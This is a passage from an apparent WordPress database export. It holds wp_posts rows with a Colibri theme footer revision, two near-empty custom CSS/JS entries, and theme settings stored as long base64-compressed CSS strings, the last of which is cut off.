align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2024-02-23 10:11:21','2024-02-23 15:11:21','',28,'https://gsudice.dataconn.net/?p=1830',0,'revision','',0),(1832,3,'2024-04-10 09:08:43','2024-04-10 13:08:43','<!-- 0563403443e7753f259423d8a0ab658d -->','','','publish','closed','closed','','1832','','','2024-04-10 09:08:43','2024-04-10 13:08:43','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&#038;p=1832',0,'custom-css-js','',0),(1834,2,'2024-04-10 17:34:30','2024-04-10 21:34:30','<!-- a679501f1e5fc22520147fa38d3d1ed3 -->','','','publish','closed','closed','','1834','','','2024-04-10 17:34:30','2024-04-10 21:34:30','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&#038;p=1834',0,'custom-css-js','',0),(1836,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','{\n    \"colibri-wp::page_content\": {\n        \"value\": {\n            \"options\": {\n                \"css_by_partials_id\": \"base64colibriH4sIAAAAAAACA91dy3bbOAz9Gi2ZQ4Dga5nHf8xxHKfyqRX31OpM8vddyEmdWLEkkEzBWXhjCxbuBXkJQBLV+JsGEXWD2Jjrxt80iLv9erVTqNUa3n3-sDl87-c-jl8hNogN3jaI3f5+u9ucfG-W+932-ue2QX116F92G3X6n2r-q9-8bFA3-qaxt08N6gb1f9uHvm3MdYMatG7QNqgbc3LA427zPPyuj5-Vr37-7hDVHdTlw-zdcDQ2-m5w-sQzKoCWxKINBdAGqWj9ZbCXQPlJTPYLIC0Phl8ei0sMEp9BqpRBysug5TNoK2XQJjL4SuIgSB8WKFQtOianqFp0ckjtV-e7TZ-P8fApqQtjOO9086cBqhZjQsxirTGLXxuzmDdmZjIRPLchfpg-Ed4sUfzIw9lv3epZnfOUISiTqOD40Rcg-TlmzKnzKCQIpCvl7xKazxF5PiJfwbg6BwyGjxiMhCAunyuf+f2XKwlULSTMKHCVRsOJicZbRmhHMkLLX3VsDavOqfetelr9u-226rf7p38O-Xb9-eUiqNtJ8woJWTyY7Rcsw9KilD2tsPy0wspMK6xqAx9R+D8KR0gYkqG+PMuqNnv-16pWaP-XqhZ8AbReKlpMECxJjaJF4Uju3LwlW2Ek2QrqkZtsBfVI4jJKA+cgDagusyoYUJ0wUXh4eVp127UyoLqLTeqrw7bf-AH0zk61m+23tv+Iqds+vf5irhvURusfz1Mz1oDqmGW+AdWJVCEDqgNY1kYzoLqp6n-UxjFswnIbBH6QEESo6ggokwDKCAVlEiJlQJ5W04hWU36tJrlaTUytptxaTXytJqlaTdO6ewkUiJQBUh3YBFBWKqi4cOWi6ZVr1GbOSvymUH5EobzqTGaF8qoz4uSZRu4nI50dPGlJ4E9GC+kJcb6MyUrFtDQXJa266a7KiI1j2ITlNtMqsHxAorxsiczIdDTqwCzfyaiDvPKd3AhIxwfpJIKEsRuhAJF9e95gW2F-a6bjs+9yAUS1DgkkhlpJnHY8LuEQIIFEgFpZnOH5MhoxhUaslkbM1LIGdGNK6aYfavjcPzfr6QWJzM7zfP4AdSnz3FU7z+d5vmDNcWrNvZ-oaFwtjy43jzGFx1gtjzHvtMaQQCOGWmnEkHk4mhR5NNXKo4G8w9FQCo1ULY2UmUabQqOtlkabeVZTSu5I1eaOlDl3pBRxpGrFkXLnjuRTePTV8ugz82hTxqOtdjzaxMX6rdYOY13JgGoNZPN22F--VeIVksE3q0sgtlouYlp4teaICFhW3Gr5aL34KUwBU3Wu6-M1L6Bau1hgnLoodpj6Ekrk5QpRgAJ4A8jF60vg9WLxRlMAbzRy8ZbQqyhXr0BTiURCk1zEUCR1AsGp0-SNLizETi5ixBKIEQUjDkUQB7mITRHlMnKVy3MqIK8ZRiEwjCJxSi2tWVaWYwWsYnD6EcbR+WhYVpFjZThsBOScit1TPVpXWxln7aoGVGtwRfIQJzgPcUXadE5wm84XibEXHOMiDRAQ3AGBUCTGQXCMQ5EYB8ExjkViHAXHOBaJcZQc41gEsdzeDxbp-aDg3g-qWASx4P6eY9U8gWfFukQXWeeKnHMhq9pEVrWJwKpsHYtDz+KQ1VBA7tO9r9a1loBzXF9WApaQX8GN9yI5lORyt0i1K3dxLdFzF9xyL9JxF9xwL9JvF9xupxJ6RXL1ikroFcnVK1tCr6xcvbIl9MrK1SuEEvfqIMi9WYdVpnCuOLEuOBGnRiHOxTfLufZmI6sYCqxLiqxqjeMfhwmXUuC5aus7l+s1Qh-646+nsPztM4KdU9gZc2WMPGpt3h00gmW-Z22wrZhHn2mEEsWRbWwoskfoYCtvtx47tieRNWoNuTcJG-5U5JZa1sxpRowYUQGOSCxFrgBaJxYt8wH8wXbGEn-lxL0hbabvPtMb0maebp5iOz2yObrTga3Yg628rcesH5FssN7ws6fBWBJUf-cbjhIf8RJ5AAA=\",\n                \"css_by_rule_id\": \"base64colibriH4sIAAAAAAACA+0dTY+jOvK37MFS90pExuBAjj2ZF2lGu3pavcu+vYwcMIlnCEbgdCfz6-cASRPAYBMgSTfSTCedVJtyuapcnzZwvgCELBsgBKwX4HwBCPk0-SV4nH+EEEAIoCVASJB1SEX18x1fs5BefO58zb6ycPPIlsdDtk4YQHCWimNIDQsDBIHzBeBlBBAECJKI7YhgPDL8fUIE4xGwXgCCcIZTYBUAY+L7LNoYgscZBILxoRYiYZutyGBMLIFZcyH4rmWgkAaycdbE+7VJ+D7yDY+HPMnAREKiNCYJjYQMmu3IhmbQEY-oCcz5mkEXSbY1IvLKNkQwHv1IBfN+HS8puWyFl5K9Hn+ArCAIgiDQxL5+gUyoQPwK0JofjHRLfP6WM0J8OP+0C++TzZo8QYCW5-8z-AwQLFNUl71VmLYyVZWZFmDGXu2+8C2I-nwwpeJoKxWnPF9BD8IgIdvkysSjkaDJxYy39F1LkL3gF1-uWGQUAfZRSsW1jFWYoqs9RTcXvdJEd+RwgajTwmSn0QCCs5BvuCHoQZQHLSmEeeAGRHFQUmHTwpc6D61qIUEPwvCpx4u7REUJBTwSRsp+50oK2dcI3Zno6qLX0zq14FVL6fa-KS2AxqxUH9hxuSGEEEK95e5BDBfaYrh4ME1jQ90p2rA8xSJ6uHZT6IydqY2d+WgLgLSniACCwPojQ89nr+dfZzmssaPR3vB4JAiLaHL+fh9eQAAEQ1b4Mhuw8BE5v0tfNxLFfQtsAIIzkiT8zXhLSBxnY0qUR7JZPyGcWUew+Oa5fccacm4hm3n7JKGR+BGTDf3BBN3dD+GtP2QoWi9b-loY7NaoKtKxzC+PQdKH4-Lb6o-O+qImMIBbXf4yRGE51iHxfo2tX+5In9y1-rhPfTGAfvgAXH2iSlGXWi-AelnTgCe0yRItRzDemC+2p5ASBAjXhILGn0zFDUw2LKoNw4yA4yzlIfMN4gn2So0LyQhZRncSiBZxOM+l+E--QfULXB+VfNsyQbtEJNc88WliCB4bBfaoBhzPUKk4hgqDhTQQRkJ8tk-zIQHCMuCEbbZq0BlkO6YZnAKuWTRPYcQcUH1IZQrk8OpECGmgQoOQBlISjCFKGRp0FGlSepaOQCWb9ZNrZkakCU-WJHSeuwhZUSlbo+qzBjP8cjN15AFC05ZviMlm-TSHGXXmOZVcW9nkHt7XONsN0tn26kMMv2o1ptDyExF4dNf0XujchFmBJ66Q47tcmNNHTqcsasHuR50yrVXvADXYRr1ZUCOYOWajmXPJGuTJRC5Ay+LPGXpWM5NSHjJ-IDOmZQNv5ugryg5upGKVqhMsaFGH3OGGtfyoNBwzrHtne5Bk55k09KSh9eWsJ4U8kBAMXBqWx70aIpU5hDxQ2VQWhuMDQBBdloVlMYbiywzaz7ePCtZ7pAHZsfCYTe3PmEYAwb9IlFZrW94K7va8rmZCJCRKA57kOmUfxzTxSNpYJlOxnkMW0Yu0uDnDdHcJQoWgiZHGxGPRpl6GulUS9azxu3tzjTGS0fG-lXf8Ueh3e--3an-3w2uJq7mmf6WtmL+R7HNIAiIptK3fC6XGo5YJ2pMFCseO8TZJzY2lViKrE5vcgk2KK-BznwoWHA2PR4JGOUpBSA8GjfzOhbd3kT5SwLD-rJJy5e+9kugOsm59uoTjsKnEfRmfGZT8qJIZ4eTGwyK3JhB6vpKi41jUmtS9sZmvFE+8BW0VvKVpya+i1cSGfTudd4egLL0xPjdcScb78+dVmPeKthNLu+3EMngQpF5CaaRszyCEvlh2l4hwIfBu5VHcf7BdzBNBIqHgOBSw-fOVJiE5Kpc+1XQN9xajt-Jy9K2xJbv1PtnQxGAejzSRq4ldm8+jVEDK6oEbskjSDEttqaSpWSxp9lQuqTKxSj5LOjXdykqVp2vkrmRVmKZ+HabZSyWmyvzKmbTq7AIWhrKS30osA7eHMlQOf9AvmS+QBJUjosVgaF3v8RUafbBTPGw82Mhz7V1o-mj9ndqnFdhOn638ttOUvnCG77rXN7Qd7a76vkjWglcHm9y5oqte-YEdl-M2XfW2O5g60e7Xtx+tXx9r9+tjCO6oXfwW2Og00srtCpVarfpUi1w5D0mNqxtC8c2L6u4C1T4bRu+OpJ9ALm6ro-psSUcdqj-123f75dE70kF3rXPuU8eM05T+iHw9YFehQmjDRCo1GKiVrPbVxeKXDoULXejCa0KCnWN2jU+-Jm6nXIjeiMFAdeeqj28Mrd1WZjpUXWL4EboOJzmf5PwDyvm0F04y8nFl5B6aDm6BybTdTaL8oKJ8RbDdHCpTgdFgI1uDjTxYghkPlmDGg51Cj7XzuthpOq5OL5HU2jw5QJn5FXc4YLWorwMQ3Jr9nDafDYb6HMzqczC7z8Fwn4PNexws7jLWFUI5WGoZa6eW8cLge1E1mQpbIC4dQ5mZVCE9nE-Ag7BONRi71GgGa1iWR8t4z+FQa4rm2uVHaD5XPw2hUSG3lI5eMytHf1aVram8qKb0oqTzTmCp7ARWr-cDoLk7HHM0SvyZcot3z2trHGscrn8C6yXi4glYLyFJheFtWeg-SzpCNa4DukDggeQZOcMJtDMcO7jDYe1q35KGXNyzLSnVYiu8ell9HV+LuT1b7nVEnEuksOl+uEpTdRGieg0WcvW1sdt6XVX29BFWv9MeJnEUcLmMvDYVLAO6CAFJhypmjMswpRMtREKiNCSC-vdpDhB+Ln709xMEqNT2cf5zgydswy6Va+HNGOdv1TZOYPmQ1ap+3BR-eswTpnHjwMok6O3Yr9rzqLKTqEzVA6lMrRsLlXRJjQevIJhykbs89qFdMKsjyQUTtwhmiSBKSr-LXYAdaQZ7o5mGMoMqyqyyixUfULeLufq7mAsQnAl6EKdSICMgkXc8FVXBmIhteS1SkfBftKlAPYMwQhbRn-ykhVnEBCOhDNAjcStcQeLdXl0Ud6FPukUWOlnKv80jZS0QqBXCaoWwWyFwK8Rcx6BpcHbcxSfgqU-JEOVrOYvnhHXR8hPBLhX4QrtvBC1g7emfIUtzw8cQxzh-vM9ST0F+FxAgyBWHpB7bvctVD5p4YerTYNzrJMsOVsxT9t6GVfY1JH-0zhQef5WDFZy3fRI+AbwECG2FiDPzeAXQapPufebRmU8E8XgUzSIqAFq9xedjs9BqH4ec+ClAKwQRAmgFEUArL+FxTH3j9EqP361vP-nx31--Y-9r+Z0X3v-+Gy3e-vfXt-m33erNW35fGObsja7jDCFpUzsRgnjb3fnsrtRLeBjKoBMaUyJOlvr511Zz3cxeLNjJXq89661qy9XE-nQMPmNyXyf3dYjrkTQMlBo9KefXAby66vPLetbCkuMR3w9hlMhl8ehDBdGVwdT7WvrOXE6+hq0e6W9zaKxw8q2SYgtr8HDywhohnLyw9RfXnmwYXRvGLtgwPktJKmhiGqlHQuob5uxnvPko5slvg0X+qZTAHNdymQyXyXC5teFiqxsuQ9gt9qexW1rNFv0s+AJPidJRE6VDu5q9Z8ymnWDaCVR3AvzImdJBnGo8pUrvZLut2y-1i1cX8yklCxBCC-1s9sLtPxni3iYZ4nz9P24mg+v3lQAA\",\n                \"global_css\": \"base64colibriH4sIAAAAAAACA+2dzXLjKBeGr4aqpKtQySDJ8TKdzPpbfBeQwhKyqUbgkfAkmaufhWRb-waBiSc9iy63E3jPewCJBxRJACEQv5QgfhHBHn7CVApFmKAlQCHAfwAU-gD4WUj1APAzJ5WC6Z7x7BGgF4DCYA8-LlUgE92KKATrnyB+EQCFAIUFKXdMwK1UShYAPwMUovDwAXBdZv3auBiRbIKlkh8L8faWSqGoUOdQ3Uod6xfPGnagrp+pFA8ky5jYQU5zVUuuWoqdIiXb7UfKzEcd8X8JBQexmiKtUHAYC8Q-U06q6gfAr5X65BSC+LVu8vavuEwJh70CwR7uuNwSDlVJRMUUk2L6N5Bwfu23wzZtlciOJVFMijqXMIirXrO9H+CWy-QX3B6VkgKgsP+jtzfOxK9mTAd7UsEtSX-tSnkU2SNAL5fyOeO0I5AzTt-ezsodkxcRmEouy9ohQBiHmK5Jp1daZVlBdrQuK6SgjrPBz3v5Fy07WS2WymV6rNxIkVSxv6hBY48lcq3G0O+1GidbOj1b7rYP63oso039uULo0Uk-B6xqjjN5VJwJaj6MuymYjMhWWVUSUR1ISYUyzKsuJsuMllDJA3xnmdo3Z-zeKapV6rrNS9lKffImcCU5y8bKlWy3Vxqx63K60evSOvHrmUXDQFNQ10FTXMcCp7lOC3Ca6zcAp-l0-rca0dOnMhfaU+c2F9rjZ5VuY+d5rnE8Ws4mXWuNMHr5cZrkQfwHwK8gfgEInXOsv4L49dIUleTsXN3DLLgnFUwlZ9uS1apwNZLHHU3H39XxApzQFTaGC13hf9+cvmj0-DfD-zfD-0tmeNtzjftI9rO-3dnIPwvozvl6pyJdhAAodKw4CiWjMRzRzpbL9NefR6no10cJD1+GX8Zz0KQWWg5G+ZrGm7V3MPoWjt2gHLoVyiEXKLdKUANxcVj-Z7O5A5hDhjA3P2juBubGbPqDuenovmBu2oEXmJsO7xvmkDeYQ95gDt0c5iymhuUwh5zDHPIAc8gLZnmOYgBzNhQx50B7DprUwhZolCSrZOUdjb6FYzcwh28Fc9gNzK1qhkvw6fMOWA6bstzsmLkflhux6ZHlJqN7Y7lJB35YbjK8b5bD3lgOe2M5fHuWWz4zLGc57JzlsAeWw14oy3MUE5azgIg5B9pz0KRWtJyMNjTdUOSdjL6FYzcsF92K5SKH11hXUdJcbEXJHbBcZMhy82PmblhuzKY-lpuO7ovlph14Ybnp8L5ZLvLGcpE3lotuznIWM8Nyloucs1zkgeUiL5TlOYoBy9lAxJwD7TloUiu22eXKn3L-f332LRy7Ybn4ViwXu73ImkSn-8R3QHOx8c7c3Ki5o525oU2fO3NT0f3tzE058LQzNxXeN83F3mgu9kZzsYeducVzw3Kai53TXOyB5mIvnOU5itHO3HKMmHOgPQdNaiXL2QiFiMSRdzb6Fo7d0FxyK5pLXNAcbmAuaj6fojtAucQQ5eaHzN2g3JhNfyg3Hd0Xyk078IJy0+F9o1ziDeUSbyiX3BzlLCaG5SiXOEe5xAPKJV4gy3MUA5SzYYg5B9pzUPOcDYQbJYDC4F3KVBYFLVMKKyVLCoVULKUAvVwKtksBFAaX554Ee1jRtH7cRsjE4ahA-FN9HijAr9VxWzB1ekbHmBY8kB2tfU9pDmUbJpmRdSyn4TI4gZK5o2tV9dqIWDjQqa7hojldL-ehJ6DhhInDUVkY0aqv6wMg3BwIi4+oqwoaXkhAsoxmb0q+paRcZEZXQud4OTJYcZbREpZE7BadbbQ1zPzsici4raGTyC3vi5uB--ALb30Ov-rW5-Crb30O-dz6rDmPXxheu8IJxbUrnB+k5A4Zxmzbaw4zs9e8krwl41xrB2v5+Saxll8+NGxa5UatcatWMCBMB+MhGDybzIHU8n7WzcxBRi4yMeRxN8cvcdhnXTmr45M46DuT7FxlZbyacdCLfUHrfuwLLu9Js1yd5eguN9M1oYPu7OlZ92ZPz5KoHPSlUYLOEjNfVbvqy7aim95sK9oSsna67tJ0mN6C-QkH3TqUtO7XoeTyjjXN2GGmLjNcstvjAmKHmvY0O9S0wFrTpF0m6zTJRftnbrv4LOqyj8+iTjpZM2+n+S7M099DKK33KLVseNqxNPDiZf-SwM-tdzMNzBjtbZoe3pUiJSyJYmIH8DPAz1uay3LZwW2qZeoPhdWBCKc2xyRNH4+3PLlDufDK8ammd6thRrmV4YzyGdvlbvvw1BwOm3h4WNhmIUVFFl6sOlW9-aMbrdNzwRJnKXuCOEtZcINmZg4yMsrE9+OpJy0feXAoZXZMVQVQyNnpG0DhHl2azd-5olecCXI+E5AdheJYbGlZBemxLKlYdHndVQirbEgnltX4NI5xz2eiVBYFFQrmsiwuc21QKVJWAIVkUQtdFzV-su1J--Reo+pA0lp39AVRSh5qwc3U+6Ha76XaDF-a1LlEfPoLNU7E7kh2FFbvTKV73c593zNFl6wwzlk8zawq9NYeLS6dW8hwmitYkowdq7pwNC1ZLwbahWdXHLorEw2nposLfUnd-Jvi2k1gsvqYcGs6MANOxA4yRYurB8kq0niJ2pPGgTQp1Hph21P-WNvK7LNvMZdCwZwUjH-W1f53oAKg8P9EVJ0AuRQKvtOLzygMhwUq9nfToquk55AzQeG+JbAKkk6BHiKc7sN9OmFvsnkczYfcLidFPxTMaCrbr2sbjOx+5rS4lng8lThAOMRkk0ejmR40Xv03aPdv0MPBHnJKMv8tgK+0QIBii84ud9uHpHmkdxIP7lTqNMHlj8l-43GwX91V9+MArzX6H80mP3OrWjd3dFe5oyDRGfurCDtJHt9Z8jq5o9hJ6pHf1BMXpzw3Iz6+s8xXWmd7N72e3Ffut+7y1ir3zNoFYQI2P4QVE7v6racFYeKyCH6Zr0bKdF9vTPXq3Wo1uzCNywqjYhndkjLYcrk7fWmWB8uT1VLvNkn7ZtQYoBig3gjh9KNZYjX-yFHJThFYVFCjWEE+4CBa783O9Zu9z59RWNCMEYDCh4KJdu118nT4eAQoJCIDKHzoia9ChA8fj3Wmpd2OR6IzRpLfZIxgHGDsc5icA46PlN7X9oDp6qyTtasBgXUGBP5NBsQqDH0Ohybc7GBA6B8BoRQmJoAAAA==\",\n                \"sheet_rules\": \"base64colibriH4sIAAAAAAACA+1d3ZebNtP-azinvWAPCPDHJeuN2+2bNG1207ztzXNkkI0SjHgkYa-3r38uvGtjGECAcLyNr7IBLGlG0mg+fjMyEDK8W2N8a3gzAyEa7v81HN9xDTTb-0-uUnJ4vv8jYqkZERwS-vLi9duEheQ+LHztuq5jRnbh003hK-vGBhoTua9eRmlb5caQd3zm3RnjOwPNQLK8w0+E3MU5ul4-xklAhGS8-EZIGnzblZ8vcPBtxVmWhOV3AYvzTb0M2lkul8vl8uW-+8F6MwOhFIchTVbldiRLyw9TLKNC2xscZ6TI6NyzA7OtcucLJiVbD9ZNrqc1CSkud7RmCwpNydm4ch6mnPLklDML9vQQ4ZBtyz2SBC9iclxjkmfk8LsY7wg-3SuHZZtygsOKMRz6jbPiMnWPw-SAkZ5hUpB1eJElVBZ+nz4NPFvtu+d0Fcly7+DO8Ap9K3YRk+VAPVz3p8r+bCnrJceJSDEniQQ5XXG2JnhDV1hSlhTGm3KWinLXbEN4jFNYNhTOLeDdg8Rc+sXFQddrElIsSbwrjEJEbPvI0lt8JHeJY3FsdkvDEvsX7OkgvXJii2XyscyEmK2YKVIc0GRlrkmSlWe+l-6AAP0BHfWHWnUm--tqRWPUNGcBSySmCeFfWjELOBj+m+H4tJHT2aCSrMUfhH-KHSv24W3EOH1micTxL7kVdJR9G8IlDareHn99nySE1zdR80mQCXAfw6M7vFaUmhANbduoobTrcDo31EtcV60jmNWolomwlKyQavyw-nrv4bEZOYUvbav8DHnHZ7Vmwbhpt74S78d0lRRGHZBEliyhZi532zBKnA5YnK2LZ0eFwRMSEZAkxImEDpbsSFl+aWlSEGBtpp+2pfhrUDfpqWYq7Vp1TfpH5I6W090FxIDb4nR3G0-3SdMOjNmKqeluR4HwSJ4kJF9y66CjyG-Vx+lEVKpokjxJzVqZB8ybV563LoIsZitm5oact1J2KVtxnEY7Vf+Na4xvZUTW5CZgMePixjXGd7B+37pHQZ9Ju71TZ8vkrXhI9lRuAa9xC0yb5qOdWTiscKk3nwcVqQVhr0m9iGhIGve-5BnpoTBULo6RTlfuCNj0IwWdzbWaiBIpDtQ81GMzGk806qZjQDcdA3SOVei0tS0evYqjrDhKwPXa8sBSavuqRg2rRk2AFTtpoUZNms4QFzUGmQ6KS94L1EcRoJIATF1jvqKJ4lFV5zQczmPctYuqdaSRCnWndNseOgccaqNRQ0ySNeS82ANOjNViLvJN0+RbO812S0756M0MhEZWkTS9CrDtAlKZ40QsGV8Xvs3SlPAAi2KQYInXNN4VPv6YksRA1gNORNHzQxPyK1E+Nw7iqJaMGw+aXSkJf9h7yfWxDIiydDKDjlIaSwIavhvIt6TBHLOM8WyDOcWJtKosszVJsttMSpb4gaQbcvaBnA5HZIvcAZdHF+iPCAPB3qLlDdHHVwv8k2WgmYGswj83lvszEC4uEGfCZ2-bmBpfLX5CnrfvOv-Hz73XXnsoBzTlXRfcEL1XT4QJS-CBd6vK5A26SxUHcGoq9ZUD3lEOoKr1IbLFB5Jk9wFLzs7miG0IN8lySQJpLhgPh9scjYKZJgnhH0BZ+DUTki53M5bIY0D9tbtlTJ5MchjcaaPtUV313sRWW+dcR81d9dyep0u9mya3WJxa4s6zcO+aAzlVDv4N4e+WSxLArmBSiv3zkHASmjiQdEP2pyayoMemeWJFHFZ7IOmG-MJZloJtFz5fnX541DxgdkqOE0Fz4JSDJpufBmGuONsayFpxtjWXnK3NGucNqMqcnOM1GJaIbT8ulyLghCQfSJJ9LA4swsJky2WAkw0WpsSLmOgOXUwBX8m0ha9k2ugrcZp8JXtfGuQngXu1zchxNDo9S0aqbQEPkZd7WOv3bEQgs9dJN1OckFiZaFcn0TZENAhPVsEnu157EEU1oSOdhEJ4CxsCXNgqiAt3pDEkYZuRM9ZJqwvRCkWVbVeF1nGHaHE1pToDFSWQqG0BD5GXe+g1HniKIeNqfk10boKpTnaNIHZBESxbKYQ11bsJXEsnrVAQy4aiWLZKGMuz+sXvW7sbIc1uG1FJqqyvJstYX2c0YMnH9FSDGoQkfQZluRsl3beIgntRTwPGwyP1zWHJwy-aaTeezu2AoO0A4YhtpLId7CaaJUvNBeZqIKImwLUONXdsRvYUYgKk+9oTFSY0hvLamm6LGAff+uZVQU5xT2voqHM0w+sXR9KadKKDiE5CRBn4foW2v3Vo+zKL49uyDDix-zVDofSi1BFkFCPQKJ6qSEznQsFAV-QNBP1sRtpqWWOQDwJBPgik4njxGh0vNGCJGVMhNeBxYtpiMX1PJEZHnERINxT2Sle4V+ENU1Dw4CHaHWA1VcQrddiRJxFRmUfbqm3eQB5I0CGv7q6K8-q7r8h77DlLHZGNRTLadqegEw+TGW1f1s6loOFcMcV9iiRMyoQtaRy3wtt0BDx07qcDaAP-5OzD0PZo+hKP3vv4kWX93FZUaOZ3ZawL2guFY+7ldE6KfXMc0kxchEbUVkS9aAzdrMVOIdUG+hRZfuHEVYmr64Iajucwc972eurs2TqL2TVIilZftPqRX7XnRhnHAibwVaULwGPvcVZVqbht4bgqsJzhgNdF5LiQFVDQN2-4lT1qkAtASMxlSycoDVjy-mhynyJ6JZUlcfa+bJ-Dca2EbL-QJI8wPvWiJmzO4rj0unKTHHtH1gt2yUBO0R2B4-g+YImoqlkSlOBFS5ZIE2+JYGtioHkQkYOrv8ZfITarwkc5V4d1Y3tTa4yQ47quM-Us2yn4Rd4AZ9FlctZxHde2bduaOJZnjx337XHWuUzOWlPXHo2skWVPx2hsT94eY93LZKyHpt5oanvj6QTZ05H7ksyQH4afhI9t8l5jKuR7KAh+PCE0O4OhODUC612pANI87xpw+AHSfcdmhCCAH4IAfkgJ4NAI8BMsoDg2aW7j90rsDVhiBsXUgNaOrlfIuX1+31p3uxpI2VNzcpd-3+gArbJ9WqQyWwMl+Hp9rElN0Ipuyd1efZmWxtJBkPA95sL0rhrUshSDUkT+oDjokl8QaBdBoF2kAlD2xo31L2ps6YjF4Un65eGFranI0IHXSHeDju4GXd0NerobHGluMNVXSUqx+CxwxgL+zPbextdf7ivMQl6jCKdETcitcbIzOcuSkISm+G+GORHmouwIo+KxLCgOL9erQrMhlthwfLrGK2KgeZqsDOd2gQUZuQaa0b9uP37aWv-3y4r5vu---vA5evd55fu+-873ff925v-t+76-nAcPv-m+79-++vvs4a8-72f+6n7pR9+o7-u+H28f5vGz7-vv3618f-Z0f2tJ20C3Bpr7vu-fPlmf-oqsz2i6Dn8No2D92f-zy6fN3+vPq0-rePfP-4ebYC2f79-9-vh7RieCbV-G8un2L5-+87eB5l8NNDfQ-Hly5-tfJ-5mNH-GwvJ93-ffxfPHbw-Zn+vZDDjgTg4Zq2qq6+YFTlgtrYAUB1QWyyBYN2P4u-+c1qysSvQ6nVxgFefpOCas4ZCCal6C18UGWCDZgvD-CBqTJCiuNZysYsjVJyRJ4ez5lIHJb5ZqBr09cQw0cxwDzQ6JudbPYPpXRVe2pdzZvhsbGWiGPKfcWSlVf7+LwDryLOMBsNPf6mQYyFmMkV24hkEL6w3kIDt0l2GR0TXrvMDGg8uZF22ISMpUGI6-lxcrkYU0IDchljhgSXKTEGmg+TY9mEJonqUxw6Ew0BxZCBlobiEDzQPO0pSEJtn95tx-ZbsPd3+672e-sdzfz3+j6fafh-vR-Xq+DWa-TU3btG+2ZJGW5RCWEgfRupyXLQLO4mJyXgV7X3RKZIG+FE5SgmXplDNPnsNlZF6malNqMxPkD8xxHOOnsmaarzkZ05CICCrDEWYcw7kcBXiLZ52IQpESEjb9qPibmBb134OjQMNKkRFZE2GgecBiuuDU3KYGmnOy3-vCQHO6xisiDDRfEBxEZoyTUAQ4JaYg2NxiSbiZYJlxYgqchKZtjeyR55npU0Q4uQnY+uZrugJ33JnHfxy55IScDn3FsRAmy2TIGDdtB43HrnOJNBC8fB3znoAVJyQxl5yIKCFCmCHZmrbrWl7N+E9F04aGhAGrkoaEASl95EkSnuDi-n59-LmBITuWyexmQQw0v30n-rh97z0j9K6oDyblxk71hpQJsE5103wIiSUNbl44vU1vArY20BwLQaQw0PzI89fJCMmamRsaEmYGbEP4KSuHis3DgVbb6utArA09w14aQVLMsWT8tqI-4GxbsyyRmJbcfN3j2G28W+OOxdNqyyslZIVPanmU4iD7tI+qQmBrmpgR0ZUdZLvjBvViSaUpWcE-Ck3rI7Q267V2jXScLummRMQaeiUJoqSUU105aQq+NsLZAwnggx5Mc5TkSX6hMvpAQoo-Jp9yTDpxyD1WgOxzmvipngX5lQBdOyKcVUe7St+o1vyuIKk5ugOMp-p+lWmLu1ygdHUE1Huv9i5WewEn2pPTOiYhVbKqVPmgjlVQqjry9LBqqrfIdKnOQR1dUFo6GrWha4BbMvb0foHjOJCrI58o2JQ9WDQT2qRKFEIMwGSOGotrp3hFzDzUoHlC2+xpqPYwGmtZqGjUGJpcMlY2PzsHJ9DEXNrK1xhoqFZVGVOskGGZIHPGJOElU-g0bRJkZmNxE3Fyamq9NKAHstI5z2VyDqxFn1M5fC2I4Cmd1KW+NUXo0MRcIuUSMnWgEqDGH7gwJ2fIKy+lOdu1idlNt67ZA1zrBV-bVT+O73WtF5qYS5XgLBp1UzZaLoTNQ4oD0hrT0GmZAJ8MecVbqTvUPKKKmrJXfNZ5b1X9QS9NOyRUf8f76n7Em4ugOegl4FVK5qGx1Szg0x0HfCq9xuYpjW1Sb+wgDzBgqjrNf9vTrpko8Czv-qu32BAyA9UCqPlv+xLhdbMnuldvRcgM0IDmmTP35v4cQvWA9I8GU1tVyx11uHC0rANWsK+lJO59L8-g1-J0vci9Dbb0Aq+K13jTFEJmoKT0T8Y6Ewi0+1laFP7ReKeRwtQZPcHJKom2Rl-8dGdC9F4+VVVVZlANsuuVT30n1j7LxFqDT6zdZ2LbnDA956Ave-VzrgfjWl3-CFy5dXKdQIwlsIueuqSTFEaZL-b-9jao9y-ZoF6PdTbk0mnIuxm071FHtu96FSwAYoGdiiC1K0YzfEldDT2oFcb71xJ+Qrv2S+fa3ihnH66qOgyqfG1dSa7sqve317PacN9ywDrNJSUX2mTSjMjBuUOwEQCFQ8IBUJCn8yodhMxAyQk3mZ6HOhe6VFCHa0NLKR6ly0PRTaXIr1KPvuvgzl9E10bIDFRu7EDTRh9rrv6FnnGNlcZln8s3AjSfhyp2TyRSbHj4jJhumTEVeTGtMl1KaPwBDmKRcoLDhup1-U-rXZOVARznebCM18f9Ug+vUUG9HDqugeKAeJ8K2Pw5Lpjva22ewxs0vK1pXaipaXWw5PZ-mF4HB8egtJgNdnPv1a7bufIG-CaXsk